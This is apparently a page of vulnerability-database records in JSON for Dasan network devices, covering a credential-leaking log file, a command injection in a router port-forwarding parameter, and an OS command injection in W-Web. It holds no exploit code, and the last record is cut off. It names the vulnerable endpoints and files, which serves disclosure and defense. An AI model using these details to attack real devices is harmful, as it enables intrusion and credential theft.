"@id": "https://www.variotdbs.pl/vuln/VAR-201904-0123",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "h660rm",
"scope": "eq",
"trust": 1.0,
"vendor": "dasannetworks",
"version": "1.03-0022"
},
{
"model": "h660rm",
"scope": "eq",
"trust": 0.8,
"vendor": "dasan",
"version": "1.03-0022"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"db": "NVD",
"id": "CVE-2019-9976"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:dasannetworks:h660rm_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Krzysztof Burghardt",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1027"
}
],
"trust": 0.6
},
"cve": "CVE-2019-9976",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2019-9976",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "VHN-161411",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2019-9976",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-9976",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-9976",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-1027",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-161411",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2019-9976",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161411"
},
{
"db": "VULMON",
"id": "CVE-2019-9976"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1027"
},
{
"db": "NVD",
"id": "CVE-2019-9976"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Boa server configuration on DASAN H660RM devices with firmware 1.03-0022 logs POST data to the /tmp/boa-temp file, which allows logged-in users to read the credentials of administration web interface users. DASAN H660RM The device firmware contains a vulnerability related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. DASAN H660RM is a GPON optical network terminal equipment produced by Korea DASAN Company. A trust management issue vulnerability exists in DASAN H660RM with firmware version 1.03-0022. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-9976"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"db": "VULHUB",
"id": "VHN-161411"
},
{
"db": "VULMON",
"id": "CVE-2019-9976"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-9976",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003419",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1027",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "152232",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-161411",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-9976",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161411"
},
{
"db": "VULMON",
"id": "CVE-2019-9976"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1027"
},
{
"db": "NVD",
"id": "CVE-2019-9976"
}
]
},
"id": "VAR-201904-0123",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-161411"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:12:07.549000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dasannetworks.com/en/"
},
{
"title": "YABWF - Yet Another Boa Webserver Fork\n\u4ee5\u4e0b\u662f\u539fBoa Webserver\u7684README\u539f\u6587\uff0c\u7528\u4e8e\u53c2\u8003",
"trust": 0.1,
"url": "https://github.com/Knighthana/YABWF "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-9976"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-532",
"trust": 1.1
},
{
"problemtype": "CWE-255",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161411"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"db": "NVD",
"id": "CVE-2019-9976"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://blog.burghardt.pl/2019/03/boa-webserver-on-dasan-h660rm-devices-with-firmware-1-03-0022-saves-post-data-including-credentials-to-tmp-boa-temp/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9976"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-9976"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/152232/dasan-h660rm-information-disclosure-hardcoded-key.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/532.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/knighthana/yabwf"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-161411"
},
{
"db": "VULMON",
"id": "CVE-2019-9976"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1027"
},
{
"db": "NVD",
"id": "CVE-2019-9976"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-161411"
},
{
"db": "VULMON",
"id": "CVE-2019-9976"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1027"
},
{
"db": "NVD",
"id": "CVE-2019-9976"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-04-11T00:00:00",
"db": "VULHUB",
"id": "VHN-161411"
},
{
"date": "2019-04-11T00:00:00",
"db": "VULMON",
"id": "CVE-2019-9976"
},
{
"date": "2019-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"date": "2019-03-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1027"
},
{
"date": "2019-04-11T19:29:01.630000",
"db": "NVD",
"id": "CVE-2019-9976"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-161411"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULMON",
"id": "CVE-2019-9976"
},
{
"date": "2019-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-003419"
},
{
"date": "2020-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1027"
},
{
"date": "2024-11-21T04:52:43.043000",
"db": "NVD",
"id": "CVE-2019-9976"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1027"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "DASAN H660RM Vulnerabilities related to certificate / password management in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-003419"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "log information leak",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1027"
}
],
"trust": 0.6
}
}
VAR-201810-0419
Vulnerability from variot - Updated: 2024-11-23 22:06The Port Forwarding functionality on DASAN H660GW devices allows remote attackers to execute arbitrary code via shell metacharacters in the cgi-bin/adv_nat_virsvr.asp Addr parameter (aka the Local IP Address field). DASAN H660GW The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Dasan H660GW is a modem device manufactured by Dasan Corporation in South Korea. There is a security hole in the Port Forwarding function in DASAN H660GW
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201810-0419",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "h660gw",
"scope": "eq",
"trust": 1.6,
"vendor": "dasannetworks",
"version": null
},
{
"model": "h660gw",
"scope": null,
"trust": 0.8,
"vendor": "dasan",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-035"
},
{
"db": "NVD",
"id": "CVE-2018-17867"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:dasannetworks:h660gw_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
}
]
},
"cve": "CVE-2018-17867",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2018-17867",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "VHN-128369",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2018-17867",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-17867",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-17867",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201810-035",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-128369",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128369"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-035"
},
{
"db": "NVD",
"id": "CVE-2018-17867"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Port Forwarding functionality on DASAN H660GW devices allows remote attackers to execute arbitrary code via shell metacharacters in the cgi-bin/adv_nat_virsvr.asp Addr parameter (aka the Local IP Address field). DASAN H660GW The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Dasan H660GW is a modem device manufactured by Dasan Corporation in South Korea. There is a security hole in the Port Forwarding function in DASAN H660GW",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-17867"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"db": "VULHUB",
"id": "VHN-128369"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-17867",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012900",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201810-035",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-128369",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128369"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-035"
},
{
"db": "NVD",
"id": "CVE-2018-17867"
}
]
},
"id": "VAR-201810-0419",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-128369"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:06:35.714000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dasannetworks.com/en/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.1
},
{
"problemtype": "CWE-77",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128369"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"db": "NVD",
"id": "CVE-2018-17867"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://wojciechregula.blog/authenticated-rce-in-dasan-routers/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-17867"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-17867"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-128369"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-035"
},
{
"db": "NVD",
"id": "CVE-2018-17867"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-128369"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"db": "CNNVD",
"id": "CNNVD-201810-035"
},
{
"db": "NVD",
"id": "CVE-2018-17867"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-01T00:00:00",
"db": "VULHUB",
"id": "VHN-128369"
},
{
"date": "2019-02-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"date": "2018-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-035"
},
{
"date": "2018-10-01T23:29:00.717000",
"db": "NVD",
"id": "CVE-2018-17867"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-128369"
},
{
"date": "2019-02-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-012900"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201810-035"
},
{
"date": "2024-11-21T03:55:05.413000",
"db": "NVD",
"id": "CVE-2018-17867"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-035"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "DASAN H660GW Command injection vulnerability in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-012900"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201810-035"
}
],
"trust": 0.6
}
}
CVE-2023-42495 (GCVE-0-2023-42495)
Vulnerability from nvd – Published: 2023-12-13 12:48 – Updated: 2024-08-02 19:23
VLAI
Title
Dasan Networks - W-Web versions 1.22-1.27 - CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Summary
Dasan Networks - W-Web versions 1.22-1.27 - CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Severity
9.8 (Critical)
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Assigner
References
1 reference
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| Dasan Networks | Dasan Networks |
Affected:
All versions , < Upgrade to the latest version.
(custom)
|
Date Public
2023-12-13 12:48
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T19:23:39.667Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.gov.il/en/Departments/faq/cve_advisories"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Dasan Networks",
"vendor": "Dasan Networks",
"versions": [
{
"lessThan": " Upgrade to the latest version.",
"status": "affected",
"version": "All versions",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Aviv Vinograzki, Dudu Moyal, Moriel Harush"
}
],
"datePublic": "2023-12-13T12:48:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\n\n\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eDasan Networks - W-Web versions 1.22-1.27 - CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\u003c/span\u003e\n\n"
}
],
"value": "\nDasan Networks - W-Web versions 1.22-1.27 - CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\n\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-12-13T12:48:41.608Z",
"orgId": "a57ee1ae-c9c1-4f40-aa7b-cf10760fde3f",
"shortName": "INCD"
},
"references": [
{
"url": "https://www.gov.il/en/Departments/faq/cve_advisories"
}
],
"source": {
"advisory": "ILVN-2023-0146",
"discovery": "UNKNOWN"
},
"title": "\t Dasan Networks - W-Web versions 1.22-1.27 - CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "a57ee1ae-c9c1-4f40-aa7b-cf10760fde3f",
"assignerShortName": "INCD",
"cveId": "CVE-2023-42495",
"datePublished": "2023-12-13T12:48:41.608Z",
"dateReserved": "2023-09-11T07:58:19.184Z",
"dateUpdated": "2024-08-02T19:23:39.667Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-42495 (GCVE-0-2023-42495)
Vulnerability from cvelistv5 – Published: 2023-12-13 12:48 – Updated: 2024-08-02 19:23
VLAI
Title
Dasan Networks - W-Web versions 1.22-1.27 - CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Summary
Dasan Networks - W-Web versions 1.22-1.27 - CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Severity
9.8 (Critical)
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Assigner
References
1 reference
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| Dasan Networks | Dasan Networks |
Affected:
All versions , < Upgrade to the latest version.
(custom)
|
Date Public
2023-12-13 12:48
Credits
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T19:23:39.667Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.gov.il/en/Departments/faq/cve_advisories"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Dasan Networks",
"vendor": "Dasan Networks",
"versions": [
{
"lessThan": " Upgrade to the latest version.",
"status": "affected",
"version": "All versions",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Aviv Vinograzki, Dudu Moyal, Moriel Harush"
}
],
